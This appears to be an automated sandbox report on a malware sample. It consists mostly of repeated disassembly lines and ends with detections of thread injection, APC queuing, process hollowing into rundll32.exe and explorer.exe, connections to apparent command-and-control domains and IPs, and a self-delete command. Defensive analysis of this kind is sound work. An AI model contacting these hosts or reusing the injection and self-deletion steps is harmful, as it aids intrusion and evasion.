          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04663D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0463A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04668DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04636DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04680EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04672073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04681074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0464B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04688A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04644257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.qq66520.com
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.129.33 80
          Source: C:\Windows\explorer.exeNetwork Connect: 166.88.88.176 80
          Source: C:\Windows\explorer.exeDomain query: www.killrstudio.com
          Source: C:\Windows\explorer.exeDomain query: www.thenorthgoldline.com
          Source: C:\Windows\explorer.exeDomain query: www.ivoirepneus.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeDomain query: www.doityourselfism.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.79.124.173 80
          Source: C:\Windows\explorer.exeDomain query: www.invisiongc.net
          Source: C:\Windows\explorer.exeDomain query: www.mzyxi-rkah-y.net
          Source: C:\Windows\explorer.exeDomain query: www.guys-only.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.196.232.108 80
          Source: C:\Windows\explorer.exeNetwork Connect: 169.62.77.158 80
          Source: C:\Windows\explorer.exeDomain query: www.avito-payment.life
          Source: C:\Windows\explorer.exeDomain query: www.cindywillardrealtor.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80
          Source: C:\Windows\explorer.exeDomain query: www.saludflv.info
          Source: C:\Windows\explorer.exeDomain query: www.builtbydawn.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Users\user\Desktop\PQMW0W5h3X.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 140000
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.337208045.00000000008B8000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000003.00000000.364488507.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
